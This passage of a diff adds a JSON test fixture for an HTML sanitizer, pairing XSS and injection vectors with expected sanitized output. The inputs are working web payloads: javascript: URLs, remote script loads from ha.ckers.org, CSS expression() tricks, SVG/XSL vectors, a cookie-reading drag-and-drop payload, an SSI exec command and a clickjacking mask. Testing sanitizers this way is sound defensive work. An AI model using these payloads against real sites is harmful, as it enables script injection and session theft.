"data": "<div id=\"x\">XXX</div>\n<style>\n\n#x{font-family:foo[bar;color:green;}\n\n#y];color:red;{}\n\n</style>", 1.457 + "sanitized": "<html><head></head><body><div id=\"x\">XXX</div>\n</body></html>" 1.458 + }, 1.459 + { 1.460 + "data": "<x style=\"background:url('x[a];color:red;/*')\">XXX</x>", 1.461 + "sanitized": "<html><head></head><body>XXX</body></html>" 1.462 + }, 1.463 + { 1.464 + "data": "<!--[if]><script>alert(1)</script -->\r\n<!--[if<img src=x onerror=alert(2)//]> -->", 1.465 + "sanitized": "<html><head></head><body></body></html>" 1.466 + }, 1.467 + { 1.468 + "data": "<div id=\"x\">x</div>\n<xml:namespace prefix=\"t\">\n<import namespace=\"t\" implementation=\"#default#time2\">\n<t:set attributeName=\"innerHTML\" targetElement=\"x\" to=\"<imgsrc=x:xonerror=alert(1)>\">", 1.469 + "sanitized": "<html><head></head><body><div id=\"x\">x</div>\n\n\n</body></html>" 1.470 + }, 1.471 + { 1.472 + "data": "<a href=\"http://attacker.org\">\n\t<iframe src=\"http://example.org/\"></iframe>\n</a>", 1.473 + "sanitized": "<html><head></head><body><a href=\"http://attacker.org\">\n\t\n</a></body></html>" 1.474 + }, 1.475 + { 1.476 + "data": "<div draggable=\"true\" ondragstart=\"event.dataTransfer.setData('text/plain','malicious code');\">\n\t<h1>Drop me</h1>\n</div>\n\n<iframe src=\"http://www.example.org/dropHere.html\"></iframe>", 1.477 + "sanitized": "<html><head></head><body><div draggable=\"true\">\n\t<h1>Drop me</h1>\n</div>\n\n</body></html>" 1.478 + }, 1.479 + { 1.480 + "data": "<iframe src=\"view-source:http://www.example.org/\" frameborder=\"0\" style=\"width:400px;height:180px\"></iframe>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea>", 1.481 + "sanitized": "<html><head></head><body>\n\n<textarea type=\"text\" cols=\"50\" rows=\"10\"></textarea></body></html>" 1.482 + }, 1.483 + { 1.484 + "data": "<script>\nfunction makePopups(){\n\tfor (i=1;i<6;i++) 
{\n\t\twindow.open('popup.html','spam'+i,'width=50,height=50');\n\t}\n}\n</script>\n\n<body>\n<a href=\"#\" onclick=\"makePopups()\">Spam</a>",
1.485 + "sanitized": "<html><head>\n\n</head><body>\n<a>Spam</a></body></html>"
1.486 + },
1.487 + {
1.488 + "data": "<html xmlns=\"http://www.w3.org/1999/xhtml\"\nxmlns:svg=\"http://www.w3.org/2000/svg\">\n<body style=\"background:gray\">\n<iframe src=\"http://example.com/\" style=\"width:800px; height:350px; border:none; mask: url(#maskForClickjacking);\"/>\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html>",
1.489 + "sanitized": "<html><head></head><body>\n\n<svg:svg>\n<svg:mask id=\"maskForClickjacking\" maskUnits=\"objectBoundingBox\" maskContentUnits=\"objectBoundingBox\">\n\t<svg:rect x=\"0.0\" y=\"0.0\" width=\"0.373\" height=\"0.3\" fill=\"white\"/>\n\t<svg:circle cx=\"0.45\" cy=\"0.7\" r=\"0.075\" fill=\"white\"/>\n</svg:mask>\n</svg:svg>\n</body>\n</html></body></html>"
1.490 + },
1.491 + {
1.492 + "data": "<iframe sandbox=\"allow-same-origin allow-forms allow-scripts\" src=\"http://example.org/\"></iframe>",
1.493 + "sanitized": "<html><head></head><body></body></html>"
1.494 + },
1.495 + {
1.496 + "data": "<span class=foo>Some text</span>\n<a class=bar href=\"http://www.example.org\">www.example.org</a>\n\n<script src=\"http://code.jquery.com/jquery-1.4.4.js\"></script>\n<script>\n$(\"span.foo\").click(function() {\nalert('foo');\n$(\"a.bar\").click();\n});\n$(\"a.bar\").click(function() {\nalert('bar');\nlocation=\"http://html5sec.org\";\n});\n</script>",
1.497 + "sanitized": "<html><head></head><body><span class=\"foo\">Some text</span>\n<a class=\"bar\" href=\"http://www.example.org\">www.example.org</a>\n\n\n</body></html>"
1.498 + },
1.499 + {
1.500 + "data": "<script src=\"/\\example.com\\foo.js\"></script> // Safari 5.0, Chrome 9, 10\n<script src=\"\\\\example.com\\foo.js\"></script> // Safari 5.0",
1.501 + "sanitized": "<html><head> </head><body>// Safari 5.0, Chrome 9, 10\n // Safari 5.0</body></html>"
1.502 + },
1.503 + {
1.504 + "data": "<?xml version=\"1.0\"?>\r\n<?xml-stylesheet type=\"text/xml\" href=\"#stylesheet\"?>\r\n<!DOCTYPE doc [\r\n<!ATTLIST xsl:stylesheet\r\n id ID #REQUIRED>]>\r\n<svg xmlns=\"http://www.w3.org/2000/svg\">\r\n <xsl:stylesheet id=\"stylesheet\" version=\"1.0\" xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\">\r\n <xsl:template match=\"/\">\r\n <iframe xmlns=\"http://www.w3.org/1999/xhtml\" src=\"javascript:alert(1)\"></iframe>\r\n </xsl:template>\r\n </xsl:stylesheet>\r\n <circle fill=\"red\" r=\"40\"></circle>\r\n</svg>",
1.505 + "sanitized": "<!DOCTYPE doc>\n<html><head></head><body>]>\n\n \n \n \n \n \n \n</body></html>"
1.506 + },
1.507 + {
1.508 + "data": "<object id=\"x\" classid=\"clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598\"></object>\r\n<object classid=\"clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B\" onqt_error=\"alert(1)\" style=\"behavior:url(#x);\"><param name=postdomevents /></object>",
1.509 + "sanitized": "<html><head></head><body>\n</body></html>"
1.510 + },
1.511 + {
1.512 + "data": "<svg xmlns=\"http://www.w3.org/2000/svg\" id=\"x\">\r\n<listener event=\"load\" handler=\"#y\" xmlns=\"http://www.w3.org/2001/xml-events\" observer=\"x\"/>\r\n<handler id=\"y\">alert(1)</handler>\r\n</svg>",
1.513 + "sanitized": "<html><head></head><body>\n\nalert(1)\n</body></html>"
1.514 + },
1.515 + {
1.516 + "data": "<svg><style><img/src=x onerror=alert(1)// </b>",
1.517 + "sanitized": "<html><head></head><body></body></html>"
1.518 + },
1.519 + {
1.520 + "data": "<svg>\n<image style='filter:url(\"data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.alert(1)</script></svg>\")'>\n<!--\nSame effect with\n<image filter='...'>\n-->\n</svg>",
1.521 + "sanitized": "<html><head></head><body>\n\n\n</body></html>"
1.522 + },
1.523 + {
1.524 + "data": "<math href=\"javascript:alert(1)\">CLICKME</math>\r\n\r\n<math>\r\n<!-- up to FF 13 -->\r\n<maction actiontype=\"statusline#http://google.com\" xlink:href=\"javascript:alert(2)\">CLICKME</maction>\r\n\r\n<!-- FF 14+ -->\r\n<maction actiontype=\"statusline\" xlink:href=\"javascript:alert(3)\">CLICKME<mtext>http://http://google.com</mtext></maction>\r\n</math>",
1.525 + "sanitized": "<html><head></head><body><math>CLICKME</math>\n\n<math>\n\n<maction actiontype=\"statusline#http://google.com\">CLICKME</maction>\n\n\n<maction actiontype=\"statusline\">CLICKME<mtext>http://http://google.com</mtext></maction>\n</math></body></html>"
1.526 + },
1.527 + {
1.528 + "data": "<b>drag and drop one of the following strings to the drop box:</b>\r\n<br/><hr/>\r\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\r\n<br/><hr/>\r\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\r\n<br/><hr/>\r\n<div id=\"dropbox\" style=\"height: 360px;width: 500px;border: 5px solid #000;position: relative;\" ondragover=\"event.preventDefault()\">+ Drop Box +</div>",
1.529 + "sanitized": "<html><head></head><body><b>drag and drop one of the following strings to the drop box:</b>\n<br><hr>\njAvascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:javascript:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\nfeed:data:text/html,<script>alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie)</script><b>\n<br><hr>\nfeed:feed:javAscript:javAscript:feed:alert('Top Page Location: '+document.location+' Host Page Cookies: '+document.cookie);//\n<br><hr>\n<div id=\"dropbox\">+ Drop Box +</div></body></html>"
1.530 + },
1.531 + {
1.532 + "data": "<!doctype html>\r\n<form>\r\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\r\n<br>\r\n<input name=\"secret\" type=\"password\">\r\n</form>\r\n<!-- injection --><svg height=\"50px\">\r\n<image xmlns:xlink=\"http://www.w3.org/1999/xlink\">\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(a)\" to=\"//example.com/?a\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(b)\" to=\"//example.com/?b\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(c)\" to=\"//example.com/?c\" />\r\n<set attributeName=\"xlink:href\" begin=\"accessKey(d)\" to=\"//example.com/?d\" />\r\n</image>\r\n</svg>",
1.533 + "sanitized": "<!DOCTYPE html>\n<html><head></head><body>\n<label>type a,b,c,d - watch the network tab/traffic (JS is off, latest NoScript)</label>\n<br>\n\n\n\n\n\n\n\n\n\n</body></html>"
1.534 + },
1.535 + {
1.536 + "data": "<!-- `<img/src=xx:xx onerror=alert(1)//--!>",
1.537 + "sanitized": "<html><head></head><body></body></html>"
1.538 + },
1.539 + {
1.540 + "data": "<xmp>\r\n<%\r\n</xmp>\r\n<img alt='%></xmp><img src=xx:x onerror=alert(1)//'>\r\n\r\n<script>\r\nx='<%'\r\n</script> %>/\r\nalert(2)\r\n</script>\r\n\r\nXXX\r\n<style>\r\n*['<!--']{}\r\n</style>\r\n-->{}\r\n*{color:red}</style>",
1.541 + "sanitized": "<html><head></head><body>\n<%\n\n<img alt=\"%></xmp><img src=xx:x onerror=alert(1)//\">\n\n %>/\nalert(2)\n\n\nXXX\n\n-->{}\n*{color:red}</body></html>"
1.542 + },
1.543 + {
1.544 + "data": "<?xml-stylesheet type=\"text/xsl\" href=\"#\" ?>\r\n<stylesheet xmlns=\"http://www.w3.org/TR/WD-xsl\">\r\n<template match=\"/\">\r\n<eval>new ActiveXObject('htmlfile').parentWindow.alert(1)</eval>\r\n<if expr=\"new ActiveXObject('htmlfile').parentWindow.alert(2)\"></if>\r\n</template>\r\n</stylesheet>",
1.545 + "sanitized": "<html><head></head><body>\n\n</body></html>"
1.546 + },
1.547 + {
1.548 + "data": "<form action=\"\" method=\"post\">\r\n<input name=\"username\" value=\"admin\" />\r\n<input name=\"password\" type=\"password\" value=\"secret\" />\r\n<input name=\"injected\" value=\"injected\" dirname=\"password\" />\r\n<input type=\"submit\">\r\n</form>",
1.549 + "sanitized": "<html><head></head><body>\n\n\n\n\n</body></html>"
1.550 + },
1.551 + {
1.552 + "data": "<SCRIPT>alert('XSS');</SCRIPT>",
1.553 + "sanitized": "<html><head></head><body></body></html>"
1.554 + },
1.555 + {
1.556 + "data": "'';!--\"<XSS>=&{()}",
1.557 + "sanitized": "<html><head></head><body>'';!--\"=&{()}</body></html>"
1.558 + },
1.559 + {
1.560 + "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>",
1.561 + "sanitized": "<html><head></head><body></body></html>"
1.562 + },
1.563 + {
1.564 + "data": "<IMG SRC=\"javascript:alert('XSS');\">",
1.565 + "sanitized": "<html><head></head><body><img></body></html>"
1.566 + },
1.567 + {
1.568 + "data": "<IMG SRC=javascript:alert('XSS')>",
1.569 + "sanitized": "<html><head></head><body><img></body></html>"
1.570 + },
1.571 + {
1.572 + "data": "<IMG SRC=JaVaScRiPt:alert('XSS')>",
1.573 + "sanitized": "<html><head></head><body><img></body></html>"
1.574 + },
1.575 + {
1.576 + "data": "<IMG SRC=javascript:alert("XSS")>",
1.577 + "sanitized": "<html><head></head><body><img></body></html>"
1.578 + },
1.579 + {
1.580 + "data": "<IMG SRC=`javascript:alert(\"RSnake says, 'XSS'\")`>",
1.581 + "sanitized": "<html><head></head><body><img></body></html>"
1.582 + },
1.583 + {
1.584 + "data": "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>",
1.585 + "sanitized": "<html><head></head><body><img></body></html>"
1.586 + },
1.587 + {
1.588 + "data": "SRC=
<IMG 6;avascript:alert('XSS')>",
1.589 + "sanitized": "<html><head></head><body>SRC=\n<img></body></html>"
1.590 + },
1.591 + {
1.592 + "data": "<IMG SRC=javascript:alert('XSS')>",
1.593 + "sanitized": "<html><head></head><body><img></body></html>"
1.594 + },
1.595 + {
1.596 + "data": "<IMG SRC=javascript:alert('XSS')>",
1.597 + "sanitized": "<html><head></head><body><img></body></html>"
1.598 + },
1.599 + {
1.600 + "data": "<IMG SRC=\"javascript:alert('XSS');\">",
1.601 + "sanitized": "<html><head></head><body><img></body></html>"
1.602 + },
1.603 + {
1.604 + "data": "<IMG SRC=\"jav	ascript:alert('XSS');\">",
1.605 + "sanitized": "<html><head></head><body><img></body></html>"
1.606 + },
1.607 + {
1.608 + "data": "<IMG SRC=\"jav
ascript:alert('XSS');\">",
1.609 + "sanitized": "<html><head></head><body><img></body></html>"
1.610 + },
1.611 + {
1.612 + "data": "<IMG SRC=\"jav
ascript:alert('XSS');\">",
1.613 + "sanitized": "<html><head></head><body><img></body></html>"
1.614 + },
1.615 + {
1.616 + "data": "<IMG SRC=\"  javascript:alert('XSS');\">",
1.617 + "sanitized": "<html><head></head><body><img></body></html>"
1.618 + },
1.619 + {
1.620 + "data": "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
1.621 + "sanitized": "<html><head></head><body></body></html>"
1.622 + },
1.623 + {
1.624 + "data": "<SCRIPT SRC=http://ha.ckers.org/xss.js?<B>",
1.625 + "sanitized": "<html><head></head><body></body></html>"
1.626 + },
1.627 + {
1.628 + "data": "<IMG SRC=\"javascript:alert('XSS')\"",
1.629 + "sanitized": "<html><head></head><body></body></html>"
1.630 + },
1.631 + {
1.632 + "data": "<SCRIPT>a=/XSS/",
1.633 + "sanitized": "<html><head></head><body></body></html>"
1.634 + },
1.635 + {
1.636 + "data": "\\\";alert('XSS');//",
1.637 + "sanitized": "<html><head></head><body>\\\";alert('XSS');//</body></html>"
1.638 + },
1.639 + {
1.640 + "data": "<INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\">",
1.641 + "sanitized": "<html><head></head><body></body></html>"
1.642 + },
1.643 + {
1.644 + "data": "<BODY BACKGROUND=\"javascript:alert('XSS')\">",
1.645 + "sanitized": "<html><head></head><body></body></html>"
1.646 + },
1.647 + {
1.648 + "data": "<BODY ONLOAD=alert('XSS')>",
1.649 + "sanitized": "<html><head></head><body></body></html>"
1.650 + },
1.651 + {
1.652 + "data": "<IMG DYNSRC=\"javascript:alert('XSS')\">",
1.653 + "sanitized": "<html><head></head><body><img></body></html>"
1.654 + },
1.655 + {
1.656 + "data": "<IMG LOWSRC=\"javascript:alert('XSS')\">",
1.657 + "sanitized": "<html><head></head><body><img></body></html>"
1.658 + },
1.659 + {
1.660 + "data": "<BGSOUND SRC=\"javascript:alert('XSS');\">",
1.661 + "sanitized": "<html><head></head><body></body></html>"
1.662 + },
1.663 + {
1.664 + "data": "<BR SIZE=\"&{alert('XSS')}\">",
1.665 + "sanitized": "<html><head></head><body><br></body></html>"
1.666 + },
1.667 + {
1.668 + "data": "<LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER>",
1.669 + "sanitized": "<html><head></head><body></body></html>"
1.670 + },
1.671 + {
1.672 + "data": "<LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\">",
1.673 + "sanitized": "<html><head></head><body></body></html>"
1.674 + },
1.675 + {
1.676 + "data": "<LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\">",
1.677 + "sanitized": "<html><head></head><body></body></html>"
1.678 + },
1.679 + {
1.680 + "data": "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>",
1.681 + "sanitized": "<html><head></head><body></body></html>"
1.682 + },
1.683 + {
1.684 + "data": "<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">",
1.685 + "sanitized": "<html><head></head><body></body></html>"
1.686 + },
1.687 + {
1.688 + "data": "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>",
1.689 + "sanitized": "<html><head></head><body></body></html>"
1.690 + },
1.691 + {
1.692 + "data": "<IMG SRC='vbscript:msgbox(\"XSS\")'>",
1.693 + "sanitized": "<html><head></head><body><img></body></html>"
1.694 + },
1.695 + {
1.696 + "data": "<IMG SRC=\"mocha:[code]\">",
1.697 + "sanitized": "<html><head></head><body><img></body></html>"
1.698 + },
1.699 + {
1.700 + "data": "<IMG SRC=\"livescript:[code]\">",
1.701 + "sanitized": "<html><head></head><body><img></body></html>"
1.702 + },
1.703 + {
1.704 + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">",
1.705 + "sanitized": "<html><head></head><body></body></html>"
1.706 + },
1.707 + {
1.708 + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">",
1.709 + "sanitized": "<html><head></head><body></body></html>"
1.710 + },
1.711 + {
1.712 + "data": "<META HTTP-EQUIV=\"Link\" Content=\"<javascript:alert('XSS')>; REL=stylesheet\">",
1.713 + "sanitized": "<html><head></head><body></body></html>"
1.714 + },
1.715 + {
1.716 + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">",
1.717 + "sanitized": "<html><head></head><body></body></html>"
1.718 + },
1.719 + {
1.720 + "data": "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>",
1.721 + "sanitized": "<html><head></head><body></body></html>"
1.722 + },
1.723 + {
1.724 + "data": "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>",
1.725 + "sanitized": "<html><head></head></html>"
1.726 + },
1.727 + {
1.728 + "data": "<TABLE BACKGROUND=\"javascript:alert('XSS')\">",
1.729 + "sanitized": "<html><head></head><body><table></table></body></html>"
1.730 + },
1.731 + {
1.732 + "data": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
1.733 + "sanitized": "<html><head></head><body><div></div></body></html>"
1.734 + },
1.735 + {
1.736 + "data": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">",
1.737 + "sanitized": "<html><head></head><body><div></div></body></html>"
1.738 + },
1.739 + {
1.740 + "data": "<DIV STYLE=\"width: expression(alert('XSS'));\">",
1.741 + "sanitized": "<html><head></head><body><div></div></body></html>"
1.742 + },
1.743 + {
1.744 + "data": "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>",
1.745 + "sanitized": "<html><head></head><body></body></html>"
1.746 + },
1.747 + {
1.748 + "data": "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">",
1.749 + "sanitized": "<html><head></head><body><img></body></html>"
1.750 + },
1.751 + {
1.752 + "data": "<XSS STYLE=\"xss:expression(alert('XSS'))\">",
1.753 + "sanitized": "<html><head></head><body></body></html>"
1.754 + },
1.755 + {
1.756 + "data": "exp/*<XSS STYLE='no\\xss:noxss(\"*//*\");",
1.757 + "sanitized": "<html><head></head><body>exp/*</body></html>"
1.758 + },
1.759 + {
1.760 + "data": "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>",
1.761 + "sanitized": "<html><head></head><body></body></html>"
1.762 + },
1.763 + {
1.764 + "data": "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>",
1.765 + "sanitized": "<html><head></head><body><a class=\"XSS\"></a></body></html>"
1.766 + },
1.767 + {
1.768 + "data": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>",
1.769 + "sanitized": "<html><head></head><body></body></html>"
1.770 + },
1.771 + {
1.772 + "data": "<BASE HREF=\"javascript:alert('XSS');//\">",
1.773 + "sanitized": "<html><head></head><body></body></html>"
1.774 + },
1.775 + {
1.776 + "data": "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>",
1.777 + "sanitized": "<html><head></head><body></body></html>"
1.778 + },
1.779 + {
1.780 + "data": "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>",
1.781 + "sanitized": "<html><head></head><body></body></html>"
1.782 + },
1.783 + {
1.784 + "data": "getURL(\"javascript:alert('XSS')\")",
1.785 + "sanitized": "<html><head></head><body>getURL(\"javascript:alert('XSS')\")</body></html>"
1.786 + },
1.787 + {
1.788 + "data": "a=\"get\";",
1.789 + "sanitized": "<html><head></head><body>a=\"get\";</body></html>"
1.790 + },
1.791 + {
1.792 + "data": "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">",
1.793 + "sanitized": "<html><head></head><body></body></html>"
1.794 + },
1.795 + {
1.796 + "data": "<XML SRC=\"http://ha.ckers.org/xsstest.xml\" ID=I></XML>",
1.797 + "sanitized": "<html><head></head><body></body></html>"
1.798 + },
1.799 + {
1.800 + "data": "<HTML><BODY>",
1.801 + "sanitized": "<html><head></head><body></body></html>"
1.802 + },
1.803 + {
1.804 + "data": "<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>",
1.805 + "sanitized": "<html><head></head><body></body></html>"
1.806 + },
1.807 + {
1.808 + "data": "<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->",
1.809 + "sanitized": "<html><head></head><body></body></html>"
1.810 + },
1.811 + {
1.812 + "data": "<? echo('<SCR)';",
1.813 + "sanitized": "<html><head></head><body></body></html>"
1.814 + },
1.815 + {
1.816 + "data": "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">",
1.817 + "sanitized": "<html><head></head><body></body></html>"
1.818 + },
1.819 + {
1.820 + "data": "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-",
1.821 + "sanitized": "<html><head> </head><body>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</body></html>"
1.822 + },
1.823 + {
1.824 + "data": "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
1.825 + "sanitized": "<html><head></head><body></body></html>"
1.826 + },
1.827 + {
1.828 + "data": "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
1.829 + "sanitized": "<html><head></head><body></body></html>"
1.830 + },
1.831 + {
1.832 + "data": "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
1.833 + "sanitized": "<html><head></head><body></body></html>"
1.834 + },
1.835 + {
1.836 + "data": "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
1.837 + "sanitized": "<html><head></head><body></body></html>"
1.838 + },
1.839 + {
1.840 + "data": "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC",
1.841 + "sanitized": "<html><head></head><body>PT SRC</body></html>"
1.842 + },
1.843 + {
1.844 + "data": "",
1.845 + "sanitized": "<html><head></head><body></body></html>"
1.846 + }
1.847 +]